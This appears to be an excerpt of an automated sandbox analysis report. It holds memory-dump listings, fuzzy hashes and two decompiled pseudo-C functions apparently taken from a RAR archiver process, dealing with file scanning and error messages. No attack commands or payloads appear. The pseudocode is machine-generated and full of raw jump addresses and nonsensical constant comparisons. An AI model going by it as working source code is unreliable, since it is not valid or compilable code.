                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 59578552-0
                                                                                                            • Opcode ID: da53615903b7aa7ce3183ea53d084c6d284c1a387ba7966bb133fb8e823a19e0
                                                                                                            • Instruction ID: 13e6bd707275e355ba25943eade0855381afc6e5ac21118917911dfe94a06967
                                                                                                            • Opcode Fuzzy Hash: da53615903b7aa7ce3183ea53d084c6d284c1a387ba7966bb133fb8e823a19e0
                                                                                                            • Instruction Fuzzy Hash: 0EE0B630E1D143A6ED2D36A588C20B824949F87321F684235E61FE53C28F2EE8924A13
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B56CC0 Relevance: .4, Instructions: 352COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E00007FF67FF650B56CC0(void* __ecx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* __rbp;
				signed int _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t140;
				signed int _t144;
				void* _t153;
				signed int _t156;
				signed int _t158;
				signed int _t159;
				void* _t208;
				signed long long _t229;
				signed long long _t231;
				signed long long _t235;
				void* _t242;
				void* _t305;
				intOrPtr* _t308;
				void* _t310;
				void* _t311;
				void* _t313;
				signed long long _t314;
				void* _t320;
				void* _t322;
				void* _t323;
				void* _t325;
				long long _t329;
				void* _t331;
				void* _t332;

				 *((long long*)(_t313 + 0x18)) = __rbx;
				 *((long long*)(_t313 + 0x20)) = __rsi;
				_t311 = _t313 - 0x1f50;
				E00007FF67FF650B69CB0(0x2050, __rax, _t322, _t323);
				_t314 = _t313 - __rax;
				_t229 =  *0x50b978f0; // 0x27db226282f1
				 *(_t311 + 0x1f40) = _t229 ^ _t314;
				_t332 = __rdx;
				_t242 = __rcx;
				_t308 = __rcx + 0x2022;
				r13d = 0;
				if ( *_t308 == r13w) goto 0x50b57212;
				r12b = r13b;
				_t231 =  *((intOrPtr*)(__rcx + 0x2000));
				if ( *((intOrPtr*)(__rcx + _t231 * 8)) != _t329) goto 0x50b56f35;
				_t99 = E00007FF67FF650B4498C(_t231, _t308);
				r13b = _t99;
				r8d = 0;
				if (_t99 != 0) goto 0x50b56d72;
				r8b =  *(__rcx + 0x2014);
				_t100 = E00007FF67FF650B3494C(_t231, __rcx, _t308, _t332); // executed
				r8d = 0;
				if (_t100 == 0) goto 0x50b56d72;
				if ( *((intOrPtr*)(_t332 + 0x100c)) == r8b) goto 0x50b56d75;
				if ( *(__rcx + 0x2014) == r8b) goto 0x50b56d6e;
				if ( *((intOrPtr*)(_t332 + 0x100d)) != r8b) goto 0x50b56d75;
				goto 0x50b56db2;
				_t156 = r8b;
				if ( *((intOrPtr*)(__rcx + 0x2000)) - r8d > 0) goto 0x50b56db7;
				_t101 =  *((intOrPtr*)(__rcx + 0x2010));
				if (_t101 == 2) goto 0x50b56db7;
				if ( *((intOrPtr*)(__rcx + 0x41b8)) == r8b) goto 0x50b56d9a;
				if (_t101 != 1) goto 0x50b56db7;
				if (r13b == 0) goto 0x50b56da4;
				if (_t101 == 3) goto 0x50b56db7;
				if ( *((intOrPtr*)(__rcx + 0x2020)) == r8b) goto 0x50b56db2;
				if (_t101 != 1) goto 0x50b56db7;
				dil = r8b;
				goto 0x50b56dba;
				dil = 1;
				if ( *((intOrPtr*)(__rcx + 0x2000)) != r8d) goto 0x50b56dca;
				 *(__rcx + 0x41b9) = dil;
				if (dil != 0) goto 0x50b56ebf;
				if (r13b != 0) goto 0x50b56ebf;
				r13d = 0;
				if (_t156 == 0) goto 0x50b56e4e;
				if (r8b == 0) goto 0x50b56e4e;
				if ( *((intOrPtr*)(__rcx + 0x2010)) == 1) goto 0x50b56e4e;
				r12b = 1;
				if ( *((intOrPtr*)(_t332 + 0x100c)) == r13b) goto 0x50b571f4;
				if ( *(__rcx + 0x2014) == r13b) goto 0x50b56e16;
				if ( *((intOrPtr*)(_t332 + 0x100d)) != r13b) goto 0x50b571f4;
				if (r12b != 0) goto 0x50b570df;
				if ( *((intOrPtr*)(__rcx + 0x2000)) != r13d) goto 0x50b570df;
				if ( *(__rcx + 0x41b9) != r13b) goto 0x50b570df;
				asm("sbb eax, eax");
				goto 0x50b57217;
				if (_t156 != 0) goto 0x50b56eb4;
				asm("sbb edi, edi");
				if ( *((intOrPtr*)(__rcx + 0x51c8)) == 0) goto 0x50b56e8d;
				 *(_t314 + 0x20) = 1;
				r9b = 1;
				r8d = 0;
				if (E00007FF67FF650B24164( *((intOrPtr*)(__rcx + 0x51c8)), __rcx,  *((intOrPtr*)(__rcx + 0x51c8)), _t308, _t308, _t311, _t331, _t329) == 0) goto 0x50b56e8d;
				goto 0x50b56eb4;
				_t29 = _t242 + 0x41c8; // 0x41c9
				_t317 = _t308;
				E00007FF67FF650B2CC24(E00007FF67FF650B2CAB4(E00007FF67FF650B24164( *((intOrPtr*)(__rcx + 0x51c8)), __rcx,  *((intOrPtr*)(__rcx + 0x51c8)), _t308, _t308, _t311, _t331, _t329), _t242, 0x50ba7ab8, _t29, _t308, _t308, _t325), 0xa, E00007FF67FF650B24164( *((intOrPtr*)(__rcx + 0x51c8)), __rcx,  *((intOrPtr*)(__rcx + 0x51c8)), _t308, _t308, _t311, _t331, _t329), 0x50ba7ab8);
				 *_t308 = r13w;
				goto 0x50b57217;
				E00007FF67FF650B69B58(_t231, 0x50ba7ab8);
				 *(_t314 + 0x38) = _t231;
				r13d = 0;
				if (_t231 == 0) goto 0x50b56ee3;
				E00007FF67FF650B34918(_t231);
				goto 0x50b56ee6;
				_t232 =  *(_t242 + 0x2000);
				 *((long long*)(_t242 +  *(_t242 + 0x2000) * 8)) = _t329;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t314 + 0x40, _t308, _t308);
				if (dil == 0) goto 0x50b56f20;
				r8d = 0x800;
				E00007FF67FF650B45224(0xa, dil,  *(_t242 + 0x2000), _t242, _t314 + 0x40, 0x50b85338, _t305, _t308, _t311, _t308, _t305);
				E00007FF67FF650B34A9C( *((intOrPtr*)(_t242 +  *(_t242 + 0x2000) * 8)));
				r8b =  *(_t242 + 0x2014);
				if (E00007FF67FF650B349C4( *(_t242 + 0x2000), _t242,  *((intOrPtr*)(_t242 +  *(_t242 + 0x2000) * 8)), _t332, _t308, _t310) != 0) goto 0x50b56df3;
				dil =  *(_t332 + 0x1044);
				 *(_t314 + 0x30) = dil;
				if (dil == 0) goto 0x50b56f7a;
				E00007FF67FF650B576EC(_t153, 0xa, _t232, _t242, _t242, _t314 + 0x30, _t308, _t320);
				dil =  *(_t314 + 0x30);
				 *((intOrPtr*)(_t311 + 0xf40)) = r13w;
				if ( *((intOrPtr*)(_t242 +  *(_t242 + 0x2000) * 8)) == 0) goto 0x50b56fa7;
				E00007FF67FF650B34930( *((intOrPtr*)(_t242 +  *(_t242 + 0x2000) * 8)));
				0x50b69b94();
				 *((long long*)(_t242 +  *(_t242 + 0x2000) * 8)) = _t329;
				_t158 =  *(_t242 + 0x2000);
				goto 0x50b56fc3;
				_t235 = _t158;
				_t208 =  *((intOrPtr*)(_t242 + _t235 * 8)) - _t329;
				if (_t208 != 0) goto 0x50b56fd0;
				_t159 = _t158 - 1;
				 *(_t242 + 0x2000) = _t159;
				if (_t208 >= 0) goto 0x50b56fba;
				if (_t159 >= 0) goto 0x50b56fe9;
				if (dil == 0) goto 0x50b56fdf;
				 *((intOrPtr*)(_t242 + 0x201c)) =  *((intOrPtr*)(_t242 + 0x201c)) + 1;
				goto 0x50b57217;
				E00007FF67FF650B6B0BC(0x5c, _t308);
				if (_t235 == 0) goto 0x50b57091;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t314 + 0x40, _t235, _t317);
				if ( *(_t242 + 0x2000) -  *(_t242 + 0x2004) >= 0) goto 0x50b57042;
				E00007FF67FF650B4511C( *(_t242 + 0x2004), _t235, _t242 + 0x3022);
				r8d = 0x7ff;
				E00007FF67FF650B5A390(_t314 + 0x42, _t235, _t317);
				 *_t235 = r13w;
				r12d = 0x800;
				r8d = r12d;
				E00007FF67FF650B5A390(_t311 + 0xf40, _t308, _t317);
				E00007FF67FF650B6B0BC(0x5c, _t308);
				r8d = r12d;
				if (_t235 != 0) goto 0x50b57083;
				_t67 = _t314 + 0x42; // 0x842
				E00007FF67FF650B5A390(_t308, _t67, _t317);
				goto 0x50b57091;
				 *_t235 = r13w;
				E00007FF67FF650B5A368(_t235, _t308, _t317);
				if ( *((intOrPtr*)(_t242 + 0x2018)) != 2) goto 0x50b570d2;
				r8b =  *(_t242 + 0x2014);
				if (E00007FF67FF650B3494C(_t235, _t242, _t311 + 0xf40, _t332) == 0) goto 0x50b570d2;
				if ( *((intOrPtr*)(_t332 + 0x100c)) == r13b) goto 0x50b570d2;
				 *(_t332 + 0x1040) =  *(_t332 + 0x1040) | 0x00000001;
				dil =  ~dil;
				asm("sbb eax, eax");
				goto 0x50b57217;
				dil =  ~dil;
				asm("sbb eax, eax");
				goto 0x50b57217;
				if ( *((intOrPtr*)(_t242 + 0x51c8)) == 0) goto 0x50b5712c;
				 *(_t314 + 0x20) = r13b;
				r9d = 0;
				r8b = 1;
				if (E00007FF67FF650B24164( *((intOrPtr*)(_t242 + 0x51c8)), _t242,  *((intOrPtr*)(_t242 + 0x51c8)), _t332, _t308, _t311) != 0) goto 0x50b57119;
				if (E00007FF67FF650B241F0(E00007FF67FF650B24164( *((intOrPtr*)(_t242 + 0x51c8)), _t242,  *((intOrPtr*)(_t242 + 0x51c8)), _t332, _t308, _t311),  *((intOrPtr*)(_t242 + 0x51c8))) == 0) goto 0x50b5712c;
				goto 0x50b57217;
				if (r12b == 0) goto 0x50b5713a;
				goto 0x50b57142;
				E00007FF67FF650B4511C(1 + _t235 * 2, 0x50b8533c, _t308);
				r8d = 0x800;
				E00007FF67FF650B5A390(_t314 + 0x40, 0x50b8533c, _t317);
				r8d = 0x800;
				_t140 = E00007FF67FF650B5A390(_t308, _t332, _t317);
				if ( *_t308 != r13w) goto 0x50b5716c;
				if ( *((intOrPtr*)(_t314 + 0x40)) != r13w) goto 0x50b5717b;
				if (1 - _t305 >= 0) goto 0x50b571d4;
				if ( *(_t242 + 0x2000) - 0x3ff >= 0) goto 0x50b571d4;
				E00007FF67FF650B43538(_t140, _t308, _t305, _t317);
				E00007FF67FF650B5A368(1, _t308, _t305);
				_t144 =  *(_t242 + 0x2000) + 1;
				 *(_t242 + 0x2000) = _t144;
				if (r12b == 0) goto 0x50b571f9;
				 *(_t242 + 0x2004) = _t144;
				goto 0x50b57217;
				E00007FF67FF650B172F0(0x56, _t308, 0x50b85340, _t314 + 0x40);
				goto 0x50b57217;
				if (r12b != 0) goto 0x50b571d0;
				r8d = 0;
				E00007FF67FF650B387CC(1, _t242, _t308, _t332);
				asm("sbb eax, eax");
				goto 0x50b56e46;
				return E00007FF67FF650B69D10(3, 0x56,  *(_t311 + 0x1f40) ^ _t314);
			}
































                                                                                                            0x7ff650b56cc0
                                                                                                            0x7ff650b56cc5
                                                                                                            0x7ff650b56cd2
                                                                                                            0x7ff650b56cdf
                                                                                                            0x7ff650b56ce4
                                                                                                            0x7ff650b56ce7
                                                                                                            0x7ff650b56cf1
                                                                                                            0x7ff650b56cf8
                                                                                                            0x7ff650b56cfb
                                                                                                            0x7ff650b56cfe
                                                                                                            0x7ff650b56d05
                                                                                                            0x7ff650b56d0c
                                                                                                            0x7ff650b56d12
                                                                                                            0x7ff650b56d15
                                                                                                            0x7ff650b56d20
                                                                                                            0x7ff650b56d29
                                                                                                            0x7ff650b56d2e
                                                                                                            0x7ff650b56d31
                                                                                                            0x7ff650b56d36
                                                                                                            0x7ff650b56d38
                                                                                                            0x7ff650b56d45
                                                                                                            0x7ff650b56d4a
                                                                                                            0x7ff650b56d4f
                                                                                                            0x7ff650b56d5a
                                                                                                            0x7ff650b56d63
                                                                                                            0x7ff650b56d6c
                                                                                                            0x7ff650b56d70
                                                                                                            0x7ff650b56d72
                                                                                                            0x7ff650b56d7f
                                                                                                            0x7ff650b56d81
                                                                                                            0x7ff650b56d8a
                                                                                                            0x7ff650b56d93
                                                                                                            0x7ff650b56d98
                                                                                                            0x7ff650b56d9d
                                                                                                            0x7ff650b56da2
                                                                                                            0x7ff650b56dab
                                                                                                            0x7ff650b56db0
                                                                                                            0x7ff650b56db2
                                                                                                            0x7ff650b56db5
                                                                                                            0x7ff650b56db7
                                                                                                            0x7ff650b56dc1
                                                                                                            0x7ff650b56dc3
                                                                                                            0x7ff650b56dcd
                                                                                                            0x7ff650b56dd6
                                                                                                            0x7ff650b56ddc
                                                                                                            0x7ff650b56de1
                                                                                                            0x7ff650b56de5
                                                                                                            0x7ff650b56dee
                                                                                                            0x7ff650b56df0
                                                                                                            0x7ff650b56dfa
                                                                                                            0x7ff650b56e07
                                                                                                            0x7ff650b56e10
                                                                                                            0x7ff650b56e19
                                                                                                            0x7ff650b56e26
                                                                                                            0x7ff650b56e33
                                                                                                            0x7ff650b56e44
                                                                                                            0x7ff650b56e49
                                                                                                            0x7ff650b56e53
                                                                                                            0x7ff650b56e5e
                                                                                                            0x7ff650b56e6d
                                                                                                            0x7ff650b56e6f
                                                                                                            0x7ff650b56e74
                                                                                                            0x7ff650b56e77
                                                                                                            0x7ff650b56e84
                                                                                                            0x7ff650b56e8b
                                                                                                            0x7ff650b56e8d
                                                                                                            0x7ff650b56e94
                                                                                                            0x7ff650b56eaf
                                                                                                            0x7ff650b56eb4
                                                                                                            0x7ff650b56eba
                                                                                                            0x7ff650b56ec4
                                                                                                            0x7ff650b56ec9
                                                                                                            0x7ff650b56ece
                                                                                                            0x7ff650b56ed4
                                                                                                            0x7ff650b56ed9
                                                                                                            0x7ff650b56ee1
                                                                                                            0x7ff650b56ee6
                                                                                                            0x7ff650b56eed
                                                                                                            0x7ff650b56ef1
                                                                                                            0x7ff650b56eff
                                                                                                            0x7ff650b56f07
                                                                                                            0x7ff650b56f09
                                                                                                            0x7ff650b56f1b
                                                                                                            0x7ff650b56f30
                                                                                                            0x7ff650b56f3c
                                                                                                            0x7ff650b56f51
                                                                                                            0x7ff650b56f57
                                                                                                            0x7ff650b56f5e
                                                                                                            0x7ff650b56f66
                                                                                                            0x7ff650b56f70
                                                                                                            0x7ff650b56f75
                                                                                                            0x7ff650b56f7a
                                                                                                            0x7ff650b56f90
                                                                                                            0x7ff650b56f95
                                                                                                            0x7ff650b56fa2
                                                                                                            0x7ff650b56fae
                                                                                                            0x7ff650b56fb2
                                                                                                            0x7ff650b56fb8
                                                                                                            0x7ff650b56fba
                                                                                                            0x7ff650b56fbd
                                                                                                            0x7ff650b56fc1
                                                                                                            0x7ff650b56fc3
                                                                                                            0x7ff650b56fc8
                                                                                                            0x7ff650b56fce
                                                                                                            0x7ff650b56fd2
                                                                                                            0x7ff650b56fd7
                                                                                                            0x7ff650b56fd9
                                                                                                            0x7ff650b56fe4
                                                                                                            0x7ff650b56ff1
                                                                                                            0x7ff650b56ffc
                                                                                                            0x7ff650b57002
                                                                                                            0x7ff650b57010
                                                                                                            0x7ff650b57021
                                                                                                            0x7ff650b5702a
                                                                                                            0x7ff650b57032
                                                                                                            0x7ff650b5703d
                                                                                                            0x7ff650b57042
                                                                                                            0x7ff650b57047
                                                                                                            0x7ff650b5704d
                                                                                                            0x7ff650b5705a
                                                                                                            0x7ff650b57067
                                                                                                            0x7ff650b5706c
                                                                                                            0x7ff650b57075
                                                                                                            0x7ff650b57077
                                                                                                            0x7ff650b5707c
                                                                                                            0x7ff650b57081
                                                                                                            0x7ff650b57083
                                                                                                            0x7ff650b5708c
                                                                                                            0x7ff650b57098
                                                                                                            0x7ff650b5709a
                                                                                                            0x7ff650b570b2
                                                                                                            0x7ff650b570bb
                                                                                                            0x7ff650b570bd
                                                                                                            0x7ff650b570c5
                                                                                                            0x7ff650b570c8
                                                                                                            0x7ff650b570cd
                                                                                                            0x7ff650b570d2
                                                                                                            0x7ff650b570d5
                                                                                                            0x7ff650b570da
                                                                                                            0x7ff650b570e9
                                                                                                            0x7ff650b570eb
                                                                                                            0x7ff650b570f0
                                                                                                            0x7ff650b570f3
                                                                                                            0x7ff650b57100
                                                                                                            0x7ff650b57117
                                                                                                            0x7ff650b57127
                                                                                                            0x7ff650b5712f
                                                                                                            0x7ff650b57138
                                                                                                            0x7ff650b5713d
                                                                                                            0x7ff650b57147
                                                                                                            0x7ff650b57152
                                                                                                            0x7ff650b57157
                                                                                                            0x7ff650b57160
                                                                                                            0x7ff650b57174
                                                                                                            0x7ff650b57183
                                                                                                            0x7ff650b5718e
                                                                                                            0x7ff650b5719a
                                                                                                            0x7ff650b571a2
                                                                                                            0x7ff650b571b2
                                                                                                            0x7ff650b571bd
                                                                                                            0x7ff650b571bf
                                                                                                            0x7ff650b571c8
                                                                                                            0x7ff650b571ca
                                                                                                            0x7ff650b571d2
                                                                                                            0x7ff650b571e8
                                                                                                            0x7ff650b571f2
                                                                                                            0x7ff650b571f7
                                                                                                            0x7ff650b571f9
                                                                                                            0x7ff650b57202
                                                                                                            0x7ff650b57209
                                                                                                            0x7ff650b5720d
                                                                                                            0x7ff650b57241

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID:
                                                                                                            • API String ID: 1863332320-0
                                                                                                            • Opcode ID: ec1618b85e6cd8fb35788ddc1271cfa3b9a0bcfac60ced9f43d7a6c55eb84fb9
                                                                                                            • Instruction ID: 0a5584b34a7e01d77cf82e67fc94dd95a477defaf5f7667c1ac06a5c2daa4cda
                                                                                                            • Opcode Fuzzy Hash: ec1618b85e6cd8fb35788ddc1271cfa3b9a0bcfac60ced9f43d7a6c55eb84fb9
                                                                                                            • Instruction Fuzzy Hash: C5E1C769B0868365FA209A21D5C06BE27A1EF57788F0C0475DE4FAB796EE2FE445C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5BCD8 Relevance: 21.7, APIs: 1, Strings: 11, Instructions: 711COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 57%
                                                                                                            			E00007FF67FF650B5BCD8(void* __edi, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __rsi, void* __rbp, void* __r8, void* __r9, long long _a16) {
				signed int _v24;
				char _v536;
				long long _v552;
				void* _t39;
				void* _t52;
				void* _t57;
				void* _t61;
				intOrPtr _t230;
				void* _t236;
				void* _t242;
				void* _t249;
				void* _t270;
				void* _t276;
				void* _t282;
				void* _t289;
				void* _t295;
				void* _t308;
				intOrPtr _t323;
				void* _t329;
				void* _t339;
				void* _t340;
				void* _t341;
				void* _t342;
				intOrPtr _t343;
				void* _t344;
				void* _t346;
				void* _t347;
				void* _t353;
				void* _t354;
				void* _t356;
				void* _t357;
				void* _t358;
				void* _t359;
				void* _t361;
				void* _t362;
				void* _t364;
				void* _t365;
				void* _t366;
				void* _t368;
				void* _t369;
				signed long long _t372;
				intOrPtr* _t391;
				intOrPtr* _t439;
				void* _t442;

				_t445 = __r8;
				_t441 = __rbp;
				_t440 = __rsi;
				_t375 = __rbx;
				_t337 = __edi;
				_a16 = __rbx;
				_t372 =  *0x50b978f0; // 0x27db226282f1
				_t373 = _t372 ^ _t442 - 0x00000240;
				_v24 = _t372 ^ _t442 - 0x00000240;
				_t230 =  *((intOrPtr*)(__rcx + 0x68));
				_t439 = __rcx;
				 *0x50bb3038 = __rdx - 0x95 - 1 > 0;
				_t339 = _t230 - 0x48;
				if (_t339 > 0) goto 0x50b5c28d;
				if (_t339 == 0) goto 0x50b5c283;
				_t340 = _t230 - 0x22;
				if (_t340 > 0) goto 0x50b5bff8;
				if (_t340 == 0) goto 0x50b5bfc3;
				_t341 = _t230 - 0x11;
				if (_t341 > 0) goto 0x50b5be90;
				if (_t341 == 0) goto 0x50b5be86;
				_t342 = _t230 - 9;
				if (_t342 > 0) goto 0x50b5be02;
				if (_t342 == 0) goto 0x50b5bdfb;
				_t343 = _t230;
				if (_t343 == 0) goto 0x50b5bde5;
				if (_t343 == 0) goto 0x50b5bde5;
				if (_t343 == 0) goto 0x50b5bdcf;
				if (_t343 == 0) goto 0x50b5bdc8;
				if (_t343 == 0) goto 0x50b5bda7;
				if (_t343 == 0) goto 0x50b5bda0;
				_t236 = _t230 - 0xfffffffffffffffb;
				if (_t343 == 0) goto 0x50b5bd83;
				_t344 = _t236 - 1;
				if (_t344 != 0) goto 0x50b5c819;
				goto 0x50b5bdd4;
				E00007FF67FF650B283F0(0x50b8598c, __rdx, __r8, __r9);
				E00007FF67FF650B54598(0xcf8, __edi, __rbx, __rsi, __rbp, _t445);
				goto 0x50b5c6c0;
				goto 0x50b5bdd4;
				E00007FF67FF650B27B00(E00007FF67FF650B54598(0xe34, __edi, _t375, _t440, _t441, _t445),  *_t439, _t372 ^ _t442 - 0x00000240,  *((intOrPtr*)(_t439 + 8)),  *_t439);
				goto 0x50b5c819;
				goto 0x50b5bdd4;
				_t39 = E00007FF67FF650B54598(0xd5c, __edi, _t375, _t440, _t441,  *((intOrPtr*)(_t439 + 8)));
				goto 0x50b5bdf1;
				E00007FF67FF650B27B00(_t39,  *_t439, L"\n%ls",  *((intOrPtr*)( *_t439)),  *_t439); // executed
				goto 0x50b5c819;
				goto 0x50b5bdd4;
				if (_t344 == 0) goto 0x50b5be71;
				if (_t344 == 0) goto 0x50b5be6a;
				if (_t344 == 0) goto 0x50b5be54;
				if (_t344 == 0) goto 0x50b5be4d;
				if (_t344 == 0) goto 0x50b5be46;
				_t242 = _t236 - 5;
				if (_t344 == 0) goto 0x50b5be3c;
				if (_t242 != 1) goto 0x50b5c819;
				E00007FF67FF650B54598(0xcfe, __edi, _t375, _t440, _t441,  *((intOrPtr*)( *_t439)));
				goto 0x50b5bdb4;
				goto 0x50b5c6b8;
				goto 0x50b5bdd4;
				goto 0x50b5bdd4;
				E00007FF67FF650B283F0("\n", L"\n%ls",  *((intOrPtr*)( *_t439)),  *((intOrPtr*)(_t439 + 0x10)));
				goto 0x50b5bdd4;
				goto 0x50b5be76;
				E00007FF67FF650B54598(0xcf6, __edi, _t375, _t440, _t441,  *((intOrPtr*)( *_t439)));
				goto 0x50b5bdef;
				goto 0x50b5bdd4;
				_t346 = _t242 - 0x1a;
				if (_t346 > 0) goto 0x50b5bf56;
				if (_t346 == 0) goto 0x50b5bf4c;
				if (_t346 == 0) goto 0x50b5bf42;
				if (_t346 == 0) goto 0x50b5bf21;
				if (_t346 == 0) goto 0x50b5bf17;
				if (_t346 == 0) goto 0x50b5bf0d;
				if (_t346 == 0) goto 0x50b5bf03;
				if (_t346 == 0) goto 0x50b5bee3;
				_t249 = _t242 - 0xc;
				if (_t346 == 0) goto 0x50b5bed9;
				_t347 = _t249 - 1;
				if (_t347 != 0) goto 0x50b5c819;
				goto 0x50b5c6b8;
				goto 0x50b5bd94;
				E00007FF67FF650B27B00(E00007FF67FF650B54598(0xeb6, __edi, _t375, _t440, _t441,  *_t439), "\n", _t372 ^ _t442 - 0x00000240,  *_t439,  *((intOrPtr*)(_t439 + 0x10)));
				goto 0x50b5c814;
				goto 0x50b5be76;
				goto 0x50b5bdd4;
				goto 0x50b5bdd4;
				E00007FF67FF650B27B00(E00007FF67FF650B54598(0xeae, _t337, _t375, _t440, _t441,  *_t439),  *_t439, _t372 ^ _t442 - 0x00000240,  *_t439,  *((intOrPtr*)(_t439 + 0x10)));
				goto 0x50b5c814;
				goto 0x50b5be2e;
				goto 0x50b5c6b8;
				if (_t347 == 0) goto 0x50b5bfb9;
				if (_t347 == 0) goto 0x50b5bfaf;
				if (_t347 == 0) goto 0x50b5bfa5;
				if (_t347 == 0) goto 0x50b5bf9b;
				if (_t347 == 0) goto 0x50b5bf91;
				if (_t347 == 0) goto 0x50b5bf87;
				if (_t249 - 0x16 != 1) goto 0x50b5c819;
				goto 0x50b5bdd4;
				goto 0x50b5c6b8;
				goto 0x50b5bdd4;
				goto 0x50b5c6b8;
				goto 0x50b5c6b8;
				goto 0x50b5bdd4;
				goto 0x50b5c6b8;
				E00007FF67FF650B54598(0xe92, _t337, _t375, _t440, _t441,  *_t439);
				E00007FF67FF650B1657C(0xe92, _t373,  &_v536, _t373, _t373,  *((intOrPtr*)(_t439 + 8)));
				_t451 =  &_v536;
				goto 0x50b5bdbb;
				if (0x100 - 0x33 > 0) goto 0x50b5c17b;
				if (0x100 == 0x33) goto 0x50b5c171;
				if (0x100 - 0x2b > 0) goto 0x50b5c0d3;
				if (0x100 == 0x2b) goto 0x50b5bf7d;
				if (0x100 == 0x2b) goto 0x50b5c0c9;
				if (0x100 == 0x2b) goto 0x50b5c0bf;
				if (0x100 == 0x2b) goto 0x50b5c0a5;
				if (0x100 == 0x2b) goto 0x50b5c09e;
				if (0x100 == 0x2b) goto 0x50b5c07c;
				if (0x100 == 0x2b) goto 0x50b5c072;
				if (0x100 == 0x2b) goto 0x50b5c054;
				if (0xd7 != 1) goto 0x50b5c819;
				goto 0x50b5c80c;
				E00007FF67FF650B54598(0xeba, _t337, _t375, _t440, _t441,  &_v536);
				r8d =  *((intOrPtr*)(_t439 + 0x44));
				E00007FF67FF650B283F0(_t373, L"%s: %s",  &_v536,  *((intOrPtr*)(_t439 + 0x10)));
				goto 0x50b5c819;
				goto 0x50b5c6b8;
				_t52 = E00007FF67FF650B54598(0xe70, _t337, _t375, _t440, _t441,  &_v536);
				r9d =  *((intOrPtr*)(_t439 + 0x44));
				r8d =  *((intOrPtr*)(_t439 + 0x40));
				E00007FF67FF650B27B00(_t52,  *_t439, _t373,  &_v536,  *((intOrPtr*)(_t439 + 0x10)));
				goto 0x50b5c819;
				goto 0x50b5c0aa;
				E00007FF67FF650B54598(0xd16, _t337, _t375, _t440, _t441,  &_v536);
				E00007FF67FF650B283F0(_t373,  *_t439,  &_v536,  *((intOrPtr*)(_t439 + 0x10)));
				goto 0x50b5c819;
				goto 0x50b5c6b8;
				goto 0x50b5be2e;
				if (0xd7 == 1) goto 0x50b5c167;
				if (0xd7 == 1) goto 0x50b5c15d;
				if (0xd7 == 1) goto 0x50b5c153;
				if (0xd7 == 1) goto 0x50b5c141;
				if (0xd7 == 1) goto 0x50b5c137;
				_t270 =  *((intOrPtr*)(_t439 + 0x40)) - 0x27;
				if (0xd7 == 1) goto 0x50b5c119;
				if (_t270 != 1) goto 0x50b5c819;
				E00007FF67FF650B54598(0xe5a, _t337, _t375, _t440, _t441, _t451);
				goto 0x50b5bdbe;
				_t57 = E00007FF67FF650B54598(0xe80, _t337, _t375, _t440, _t441,  *_t439);
				r8d =  *((intOrPtr*)(_t439 + 0x40));
				E00007FF67FF650B27B00(_t57,  *_t439, _t373,  *_t439,  *((intOrPtr*)(_t439 + 8)));
				goto 0x50b5c819;
				goto 0x50b5be76;
				E00007FF67FF650B54598(0xe58, _t337, _t375, _t440, _t441,  *_t439);
				goto 0x50b5bddd;
				goto 0x50b5c6b8;
				goto 0x50b5c6b8;
				goto 0x50b5c6b8;
				goto 0x50b5c80c;
				_t353 = _t270 - 0x3c;
				if (_t353 > 0) goto 0x50b5c216;
				if (_t353 == 0) goto 0x50b5c20c;
				if (_t353 == 0) goto 0x50b5c5ee;
				if (_t353 == 0) goto 0x50b5c202;
				if (_t353 == 0) goto 0x50b5c1f8;
